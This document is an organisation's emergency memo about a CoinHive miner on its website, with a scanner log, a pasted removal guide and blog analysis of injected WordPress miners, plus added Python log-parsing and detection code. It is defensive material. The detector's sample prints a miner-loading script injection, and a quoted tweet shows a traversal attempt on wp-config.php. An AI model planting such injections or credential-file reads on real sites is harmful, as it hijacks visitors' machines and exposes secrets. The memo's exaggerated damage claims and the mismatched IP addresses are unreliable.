Emergency Memorandum 12/27/17, early hours
To: USL Board (by email & @ www:UniformedServicesLeague.org/HackAttack)
From: Management Team (Executive Director, Chairman & Principal Consultant)
Ref: Hack Attack (Near-crippling attack on USL website, Late Night Counter-attack)
Result: Successful defense but attacks on USL website expected to be ongoing
Issue: Uniformed Services League website came under malicious attack evening of 12/26. The invader penetrated USL website, infected it, threatened to infect visitors.
Solution Summary. USL should consider purchasing (expensive) cyber security software and/or retaining expert computer technicians as a result of an attack which threatened to totally shut down the website UniformedServicesLeague.org. There is an urgent need for additional funding in order to prevent destruction of the website, or at least to better monitor the website so that future attacks are reported and USL can mount a defense and counter-attack.
If we fail to act, continued internet attacks on the USL website could result in infection (virus attack) by a worse malicious program. USL could be blacklisted on the search engines, meaning that they will report that we are an unsafe site and prevent our supporters and other visitors from reaching our website and reading our message. Worse still, search engines could simply delist USL so that it no longer appears in search engine results.
The virus scanner log, reported in cryptic terms comprehensible only to a programmer, developer or technician, passed on the following message. A translation follows it. Here’s the message:
Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here
12/26/2017 8:41:35 PM;HTTP filter;file;https://coinhive.com/lib/coinhive.min.js;JS/CoinMiner.D potentially unwanted application;connection terminated;Ron-Z600pc\Ron;Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe (54EADC78AA30324B87256E626A769B6BBE4E4580).;116CB0BD8425DEE9FB6E47C6FE119FA63D1B0E29;
Here’s the English translation.
- Don’t go to this website (UniformedServicesLeague.org). It is dangerous. At best, this is a PUP – a “potentially unwanted program” that could infect every visitor to our website. At worst, it is a virus which will attack and hurt the ability of every visitor to access their own computer and the internet, or even damage or destroy our website, effectively erasing our message from the internet by hostile invading forces.
- In the event this invasion of our website is not countered and eradicated, then at the least, visitors will be turned away from our website, and our voice and message to them silenced. At worst, visitors will find that the penalty for visiting our website is that their home computer could become infected and no longer work properly, and important files on their computer could become inaccessible or hard to access. The visitor whose computer became so infected might then infect others from their computer over the internet.
- The internet community would, if this hostile hacker attack were not immediately fixed by finding and destroying the virus invader, ban the USL website and prevent people from visiting it. This surprise internet hack attack would literally destroy our voice on the internet if we did not find a way to kick out the internet invader and block them from sneaking onto our website again.
- Hire expert, more advanced programmers to search out and destroy the invader. Make use of more advanced programs than we have had before this date to assist in this task. The initial counter-attack was successful, but the vulnerability to future attacks remains. More funding is needed for continued vigilance by expert technicians and ongoing defense work in order to keep the UniformedServicesLeague.org website accessible for visitors, now that we have been subjected to an ongoing internet hack attack and have been warned of future attacks.
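The scanner record quoted above, parsed by an added Python example (not part of the memo) so that each semicolon-separated field can be read by name; the log text in the block is a constructed copy of the two quoted lines, and the field meanings follow the header row.

```python
import re
from urllib.parse import urlparse

# Constructed copy of the scanner export quoted in the memo: a semicolon-separated
# header row followed by one detection record.
SCANNER_LOG = (
    "Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here\n"
    "12/26/2017 8:41:35 PM;HTTP filter;file;https://coinhive.com/lib/coinhive.min.js;"
    "JS/CoinMiner.D potentially unwanted application;connection terminated;Ron-Z600pc\\Ron;"
    "Threat was detected upon access to web by the application: "
    "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe "
    "(54EADC78AA30324B87256E626A769B6BBE4E4580).;"
    "116CB0BD8425DEE9FB6E47C6FE119FA63D1B0E29;"
)
# "Information" names the program that made the request and its SHA-1 in parentheses.
APP_RE = re.compile(r"application:\s*(?P<path>.+?)\s*\((?P<sha1>[0-9A-Fa-f]{40})\)")

def parse_scanner_log(text):
    """Return one dict per record, keyed by the names in the header row."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    fields = lines[0].split(";")
    records = []
    for line in lines[1:]:
        values = line.split(";")
        values += [""] * (len(fields) - len(values))  # pad missing trailing fields
        records.append(dict(zip(fields, values)))
    return records

def summarize(record):
    """Pull out what a responder needs: what was blocked, where, and by which program."""
    threat, _, category = record["Threat"].partition(" ")
    m = APP_RE.search(record["Information"])
    return {
        "timestamp": record["Time"],
        "detection": threat,                               # JS/CoinMiner.D
        "category": category,                              # potentially unwanted application
        "script_url": record["Object"],
        "blocked_host": urlparse(record["Object"]).hostname,
        "blocked": record["Action"] == "connection terminated",
        "application": m.group("path") if m else None,     # the requesting browser
        "application_sha1": m.group("sha1").upper() if m else None,
        "object_sha1": record["Hash"],
        "user": record["User"],
    }

if __name__ == "__main__":
    for rec in parse_scanner_log(SCANNER_LOG):
        for key, value in summarize(rec).items():
            print(f"{key:>17}: {value}")
```

Read this way, the record says the endpoint's HTTP filter cut the browser's connection to coinhive.com before the script ran, which is the detail to keep when deciding what to check next on the site itself.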
This report developed by:
- (Credits). USPPC Executive Director worked on this problem late evening and into the morning, along with USPPC Sec/Treasurer in his capacity as a technician and programmer and principal consultant. All work reviewed and approved by Chairman. Total expenses could have been $1000, $2000 or more, but for tonight’s emergency did not exceed $100 as a favor to USL in this emergency. Additional funding needed on an ongoing basis to maintain security and defense after what appears to be targeting of Uniformed Services League by malicious forces on the internet determined to hurt us at best, or outright destroy our website and our voice.
Additional information follows on the minimum damage done to us tonight. Much worse is expected if this targeting of USL continues, and we have been warned.
How to remove CoinHive Miner Trojan (Virus Removal Guide)
By Stelian Pilici on September 28, 2017
The Coinhive Miner Trojan is commonly bundled with other free programs or browser extensions that you download off of the Internet. Unfortunately, some free downloads do not adequately disclose that other software will also be installed and you may find that you have installed Coinhive Miner without your knowledge.
Once this malicious program or browser extension is installed, the Coinhive Miner will inject an in-browser Monero miner from coin-hive.com/lib/coinhive.min.js, which uses more than 50% of your CPU’s power and graphics card’s power. What this means is that when the miners are running you will find that your computer is running slower and games are stuttering or freezing, because the Coinhive Miner Trojan is using your computer’s resources to generate revenue for its operators.
This will cause your CPU to run at very hot temperatures for extended periods of time, which could shorten the life of the CPU.
When infected with the Coinhive Miner, other common symptoms include:
- Very high CPU and graphics cards usage
- Web browser is using more than 50% of the CPU power
- PC connects to coin-hive.com/lib/coinhive.min.js
- Windows minimize and maximize slowly, and programs run slower
- Programs don’t launch as quickly
- General slowness when using the PC or Web Browser
Hacked Websites Mine Cryptocurrencies
Cryptocurrencies are all the rage now. Bitcoin, altcoins, blockchain, ICO, mining farms, skyrocketing exchange rates – you see or hear this every day in the news now. Everyone seems to be trying to jump on this bandwagon.
Visitor’s computer CPU load
Like with any other type of website monetization, this one is prone to abuse, especially in its early stages. It didn’t take long for us to encounter the CoinHive miner installed on hacked sites. It’s a natural move for bad actors who similarly abuse other legitimate means of website monetization, for example, installing their own ad or affiliate codes to third-party sites.
Malicious Injection with CoinHive Miner
In this case, a webmaster contacted us and said that some of their site visitors noticed high processor load while visiting the site. Some of them even identified the CoinHive cryptominer there. Indeed, the HTML code of web pages contained this code in the footer section:
(Figure: the security.fblaster[.]com script that loaded the CoinHive Miner script)
(Figure: CoinHive miner on security.fblaster[.]com)
It’s not the official way to use the CoinHive Miner (which is supposed to be loaded from lib/coinhive.min.js on their own site), but if you check the first long line of the “security.fblaster[.]com” script you’ll see that it’s identical to CoinHive’s own coinhive.min.js. The rest of the lines are the part that initializes the miner using the site’s unique key and starts it on page load.
We searched for security.fblaster[.]com and found very similar injections on a few other sites.
The names of the scripts are made to appear legitimate so that the webmaster doesn’t get alarmed when seeing them. Moreover, a couple of sites we investigated referenced the domain names of the infected sites within the malicious script – making them look even more as if they belong on the sites.
Those scripts have already been removed from most of the infected sites, but one site still had the live script, and it loaded the same crypto-miner with another site key: XMzUIs3Jx7qkRuPPfxG4I5k4AdXfQV6D.
Cryptominer Re-uses Old Infection
We checked the infected sites on the Wayback Machine and tracked that injection down to the end of 2016. We also noticed that the IP address of the “security.fblaster[.]com” server (220.127.116.11 – Digitalocean Amsterdam) was mentioned in a tweet about attacks that tried to exploit the RevSlider vulnerability:
#RevSlider #soaksoak #malware attempts from 18.104.22.168 (NL) ../wp-config.php
Moreover, on the site whose webmaster contacted us, the script was only injected on September 19th, 2017 (which was confirmed by Google cache). We also noticed that the script had a long number in the ?id= parameter that changed on every page load, while in scripts on other sites it was always ?id=1.
It appears as if this is not a new infection, but since the attackers already control the “security.fblaster[.]com” server, they can easily modify the malicious script without having to change anything on sites that they had infected previously.
Since the cryptocurrency miner only produces meaningful results on sites with lots of visitors (or on a large number of less popular sites), they began to inject the miner into new sites just a few days ago. At this point the security.fblaster[.]com infection is not massive (although there are other similar attacks, as you’ll read below), as we don’t see it on many other sites, so the attackers are probably still testing this approach.
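An added example (not code from the post above): a small Python check that flags the kind of footer injection described, an external loader served from the security.fblaster[.]com host or any coinhive.min.js path, and extracts the CoinHive site key from inline starter code. The sample footer is constructed; the loader's file name and ?id= value are assumptions, and the key regex assumes the starter uses CoinHive's CoinHive.Anonymous(...) or CoinHive.User(...) constructor.

```python
import re
from urllib.parse import urlparse

# Hosts tied to the injection in the post (defanged brackets removed) plus the
# official CoinHive script hosts named on this page.
MINER_HOSTS = {"security.fblaster.com", "coinhive.com", "coin-hive.com"}
SCRIPT_SRC_RE = re.compile(r"<script[^>]+src\s*=\s*['\"]([^'\"]+)['\"]", re.I)
# Assumption: the starter code calls CoinHive's constructor with a 32-char site key.
SITE_KEY_RE = re.compile(r"CoinHive\.(?:Anonymous|User)\(\s*['\"]([A-Za-z0-9]{32})['\"]")

def scan_page(html):
    """Return external miner loaders and inline CoinHive site keys found in one page."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(html):
        u = urlparse(src if "://" in src else "https:" + src)  # also handles //host/path
        host = (u.hostname or "").lower()
        if host in MINER_HOSTS or u.path.endswith("coinhive.min.js"):
            findings.append({"type": "loader", "host": host, "path": u.path, "query": u.query})
    for key in SITE_KEY_RE.findall(html):
        findings.append({"type": "site_key", "key": key})
    return findings

# Constructed sample footer modelled on the injection described in the post: an
# innocuous-looking "security" script with a per-load ?id= value, followed by an
# inline starter using the site key quoted above. File name and id are made up.
SAMPLE_FOOTER = """
<footer>...</footer>
<script src="https://security.fblaster.com/security.js?id=1711539928"></script>
<script>
var miner = new CoinHive.Anonymous('XMzUIs3Jx7qkRuPPfxG4I5k4AdXfQV6D');
miner.start();
</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_FOOTER):
        print(finding)
```

Run it over the rendered HTML of each page (or the theme's footer template), since the post notes the loader's file names are chosen to look legitimate and the ?id= value alone is not a stable indicator.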
Infected Files on WordPress
Now let’s see how this infection works on the server. A quick scan revealed modified core WordPress files.
The first modification was discovered at the top of the wp-admin/admin-header.php